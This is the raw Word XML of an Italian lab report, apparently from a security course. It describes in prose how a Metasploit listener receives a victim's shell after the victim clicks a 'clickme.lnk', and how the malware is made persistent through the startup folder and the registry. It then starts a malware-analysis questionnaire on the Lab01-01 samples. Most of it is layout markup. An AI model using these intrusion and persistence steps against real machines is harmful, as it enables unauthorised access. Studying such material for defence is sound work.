                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId132">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="33394" t="25889" r="43675" b="26873"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3542958" cy="4105302"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD083D" w14:textId="6B53CCAA" w:rsidR="006953EB" w:rsidRDefault="00DB68FF" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Impostiamo come in figura metasploit e ci mettiamo in ascolto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCAE3C" w14:textId="7B8F4E88" w:rsidR="00DB68FF" w:rsidRDefault="00DB68FF" w:rsidP="00CE69F0">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc140165809"/>
      <w:r>
        <w:t>5.7 Fase cinque, Exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="4632A06A" w14:textId="6392085E" w:rsidR="00506565" w:rsidRDefault="00DB68FF" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Quando la vittima cliccherà sul file clickme.</w:t>
      </w:r>
      <w:r w:rsidR="00E46C8F">
        <w:t>lnk</w:t>
      </w:r>
      <w:r w:rsidR="006F5072">
        <w:t xml:space="preserve"> avrà inizio l’attacco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2A2ADE" w14:textId="0F136185" w:rsidR="00B80587" w:rsidRDefault="00B80587" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Verifichiamo che sulla macchina sono presenti i file scaricati dalla macchina attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6ACE7D" w14:textId="5702A96A" w:rsidR="00506565" w:rsidRPr="00DB68FF" w:rsidRDefault="00506565" w:rsidP="00DB68FF">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ED28235" wp14:editId="2E0C33D1">
            <wp:extent cx="6840220" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1429369536" name="Immagine 10" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticament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9536" name="Immagine 10" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId133"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId134">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="6736" t="17132" r="16873" b="36725"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6852949" cy="2710134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF912F" w14:textId="1C72EE4C" w:rsidR="00CE69F0" w:rsidRDefault="000B172C" w:rsidP="00CE69F0">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">L’attaccate avrà quindi a disposizione </w:t>
      </w:r>
      <w:r w:rsidR="00AC7B89">
        <w:t>la shell della vittima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D023BC" w14:textId="56F698BD" w:rsidR="00CE69F0" w:rsidRDefault="0063178B" w:rsidP="00CE69F0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54219197" wp14:editId="3F266DF2">
            <wp:extent cx="3437990" cy="3305175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="214747789" name="Immagine 1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789" name="Immagine 11" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId132">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="33250" t="53762" r="44678" b="8514"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3444802" cy="3311724"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC165D" w14:textId="3D1FF8A5" w:rsidR="00CE69F0" w:rsidRDefault="00CE69F0" w:rsidP="00680279">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="615F039F" wp14:editId="738054C2">
            <wp:extent cx="4745773" cy="2961640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54935206" name="Immagine 12" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticament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206" name="Immagine 12" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId135"/>
                    </pic:cNvPr>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418" t="71907" r="49408" b="9037"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4764071" cy="2973059"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92A3FE" w14:textId="77777777" w:rsidR="00CE69F0" w:rsidRDefault="00CE69F0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="460B7D25" w14:textId="27FF43D2" w:rsidR="00391BE7" w:rsidRPr="00BA4352" w:rsidRDefault="00BA4352" w:rsidP="002169F8">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71A9F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04DAB3CC" wp14:editId="0F809B4D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>278418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="123825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapNone/>
            <wp:docPr id="1090363184" name="Immagine 1" descr="Immagine che contiene testo, schermata,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3184" name="Immagine 1" descr="Immagine che contiene testo, schermata, numero, documento&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId137"/>
                    <a:srcRect b="97321"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="12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 w:name="_Toc140165810"/>
      <w:r w:rsidR="00AF082F" w:rsidRPr="0053634C">
        <w:rPr>
          <w:rStyle w:val="Titolo1Carattere"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 </w:t>
      </w:r>
      <w:r w:rsidR="00607014" w:rsidRPr="0053634C">
        <w:rPr>
          <w:rStyle w:val="Titolo1Carattere"/>
        </w:rPr>
        <w:t>Mitre ATT&amp;CK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="551CAD0C" w14:textId="1BB19AE5" w:rsidR="002406C7" w:rsidRDefault="000B6BF4" w:rsidP="009E5101">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4674AF5C" wp14:editId="0E676DAD">
            <wp:extent cx="8605492" cy="6649699"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="1922290139" name="Elemento grafico 1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0139" name="Elemento grafico 14">
                      <a:hlinkClick r:id="rId138"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139">
                      <a:extLst>
                        <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                          <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId140"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="5400000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="8605492" cy="6649699"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED752BC" w14:textId="1B272001" w:rsidR="002406C7" w:rsidRDefault="002406C7" w:rsidP="002406C7">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc140165811"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.8 </w:t>
      </w:r>
      <w:r w:rsidR="00B34F18">
        <w:t>Persistenza</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="6D8DE5F2" w14:textId="004B1F51" w:rsidR="00B34F18" w:rsidRDefault="00852BAB" w:rsidP="00B34F18">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="00852BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CFD29DC" wp14:editId="56174808">
            <wp:extent cx="6645910" cy="3827145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="65186372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3729" name="Immagine 1" descr="Immagine che contiene testo, schermata, diagramma, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3827145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D364C0" w14:textId="1A9AC74B" w:rsidR="00E92110" w:rsidRDefault="00403EF6" w:rsidP="00B34F18">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per rendere persistente il malware, e che quindi venga eseguito ad ogni avvio del </w:t>
      </w:r>
      <w:r w:rsidR="003D64B8">
        <w:t xml:space="preserve">s.o. modifichiamo il launcher in modo che </w:t>
      </w:r>
      <w:r w:rsidR="00453EF0">
        <w:t xml:space="preserve">il launcher venga copiato nella cartella </w:t>
      </w:r>
      <w:r w:rsidR="00D541CB">
        <w:t>dei programmi che vanno avviati all’avvio del sistema, e inoltre lo aggiungiamo al registro di sistema</w:t>
      </w:r>
      <w:r w:rsidR="00DB1A1D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8C578" w14:textId="411BF6AF" w:rsidR="00482E76" w:rsidRDefault="00482E76" w:rsidP="00B34F18">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A65D8AC" wp14:editId="4F992623">
            <wp:extent cx="6616189" cy="1362075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="66391952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9528" name="Immagine 1" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Descrizione generata automaticamente"/>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67" t="70070" r="46216" b="11075"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6642684" cy="1367530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0BED8B" w14:textId="0BFB8008" w:rsidR="00482E76" w:rsidRDefault="002A1CD8" w:rsidP="00B34F18">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Provando a riavviare la macchina, è possibile verificare che il malware </w:t>
      </w:r>
      <w:r w:rsidR="001F6268">
        <w:t>sia tornato in esecuzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F1745" w14:textId="2DAB73DD" w:rsidR="00B97134" w:rsidRDefault="00B97134">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3EB536" w14:textId="15ED39F1" w:rsidR="00D2420B" w:rsidRDefault="00D2420B" w:rsidP="00D2420B">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:ind w:left="720"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc140165812"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Basic Malware Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="7453E904" w14:textId="35ED3370" w:rsidR="00760D04" w:rsidRDefault="00760D04" w:rsidP="00760D04">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>La malware analysis è una disciplina che si occupa di analizzare i malware. Lo scopo principale della malware analysis è comprendere come funzionano i malware, quali sono le loro capacità e quali danni possono causare. Questa analisi è fondamentale per sviluppare contromisure e proteggere i sistemi informatici da future infezioni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAA4DB" w14:textId="4781D80A" w:rsidR="00760D04" w:rsidRDefault="00760D04" w:rsidP="00760D04">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Ci sono diversi tipi di malware, come virus, worm, trojan, ransomware e molti altri. La malware analysis coinvolge diverse metodologie e tecniche per analizzare questi programmi dannosi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D6C7D" w14:textId="2340E7E7" w:rsidR="00760D04" w:rsidRDefault="00760D04" w:rsidP="00760D04">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Una delle principali attività della malware analysis è l'analisi statica. Questo processo coinvolge l'esame del codice sorgente o dell'eseguibile del malware senza eseguirlo effettivamente. L'obiettivo è comprendere la struttura del malware, identificare funzionalità dannose o sospette e raccogliere informazioni sul suo comportamento potenziale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C51AA47" w14:textId="3E87BA8C" w:rsidR="00D2420B" w:rsidRPr="00D2420B" w:rsidRDefault="00760D04" w:rsidP="00760D04">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>Un'altra tecnica utilizzata è l'analisi dinamica, che comporta l'esecuzione del malware in un ambiente controllato, chiamato sandbox, al fine di osservare il suo comportamento durante l'esecuzione. Questo aiuta a identificare le azioni che il malware compie sul sistema, come la creazione di file, la comunicazione di rete, la modifica del registro di sistema, ecc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588A427" w14:textId="77777777" w:rsidR="00B97134" w:rsidRDefault="00B97134" w:rsidP="00B34F18">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EB2DCC" w14:textId="2DBCC641" w:rsidR="00F01C02" w:rsidRDefault="00F01C02" w:rsidP="00F01C02">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc140165813"/>
      <w:r>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:r w:rsidR="00E77332">
        <w:t>Questionario Lab01-01</w:t>
      </w:r>
      <w:r w:rsidR="005A07A1">
        <w:t xml:space="preserve">.exe e </w:t>
      </w:r>
      <w:r w:rsidR="00CE7A3E">
        <w:t>Lab01-01.dll</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="16617F31" w14:textId="3B435715" w:rsidR="00E74964" w:rsidRDefault="00E74964" w:rsidP="00363DFF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="0048406D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Caricare i file su http://www.VirusTotal.com e visualizzare i rapporti. Uno dei due file corrisponde a qualche firme antivirus esistenti?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60222433" w14:textId="77777777" w:rsidR="00D10D66" w:rsidRDefault="00377035" w:rsidP="00363DFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00E27495">
        <w:t xml:space="preserve"> due</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file caricati su VirusTotal</w:t>
      </w:r>
      <w:r w:rsidR="00E27495">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C205B9">
        <w:t>vengono contrassegnati come dannosi</w:t>
      </w:r>
      <w:r w:rsidR="00D10D66">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A087055" w14:textId="1F47129C" w:rsidR="00363DFF" w:rsidRDefault="00D10D66" w:rsidP="00363DFF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il file .exe </w:t>
      </w:r>
      <w:r w:rsidR="00922031">
        <w:t>viene classificato come trojan.ulise/aenjaris</w:t>
      </w:r>
      <w:r w:rsidR="00961BED">
        <w:t xml:space="preserve">, mentre la dll viene catalogato come </w:t>
      </w:r>
      <w:r w:rsidR="00377035">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009770DD">
        <w:t>trojan.ulise/skeeyah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAE4C20" w14:textId="1740BFBD" w:rsidR="00363DFF" w:rsidRDefault="00363DFF" w:rsidP="00363DFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DF5D676" wp14:editId="0ED157E1">
            <wp:extent cx="6262255" cy="2890825"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
            <wp:docPr id="1002586799" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Icona del computer&#10;&#10;Descrizione generata automaticamente">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6799" name="Immagine 1" descr="Immagine che contiene testo, schermata, software, Icona del computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId142"/>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l="9459" t="12002" r="17913" b="34427"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6351815" cy="2932168"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E156C" w14:textId="77777777" w:rsidR="00363DFF" w:rsidRDefault="00363DFF" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="690E5EF9" w14:textId="4DAFFCB2" w:rsidR="009770DD" w:rsidRDefault="00363DFF" w:rsidP="00363DFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04F92454" wp14:editId="2F3DFEC5">
            <wp:extent cx="6557110" cy="2955636"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1782014537" name="Immagine 2" descr="Immagine che contiene testo, schermata, software, Icona del computer&#10;&#10;Descrizione generata automaticament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4537" name="Immagine 2" descr="Immagine che contiene testo, schermata, software, Icona del computer&#10;&#10;Descrizione generata automaticamente">
                      <a:hlinkClick r:id="rId144"/>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l="9042" t="12832" r="17524" b="34518"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6575881" cy="2964097"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133E6F8" w14:textId="77777777" w:rsidR="00363DFF" w:rsidRDefault="00363DFF" w:rsidP="00363DFF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35594415" w14:textId="631A50FE" w:rsidR="00E74964" w:rsidRDefault="00E74964" w:rsidP="00E74964">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r w:rsidRPr="0048406D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Quando sono stati compilati questi file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5661AE14" w14:textId="656EDDEB" w:rsidR="00111872" w:rsidRDefault="00224FE9" w:rsidP="00E74964">
      <w:pPr>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I file sono stati compilati </w:t>
      </w:r>
      <w:r w:rsidR="00C26751">
        <w:t>il 19 Dicembre 2010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E81564" w14:textId="45B58940" w:rsidR="00E74964" w:rsidRDefault="00111872" w:rsidP="00D73B25">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1276979458"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AC1E0C4" wp14:editId="40A9970A">
            <wp:extent cx="2250000" cy="1051200"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1559817915" name="Immagine 3">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7915" name="Immagine 3">
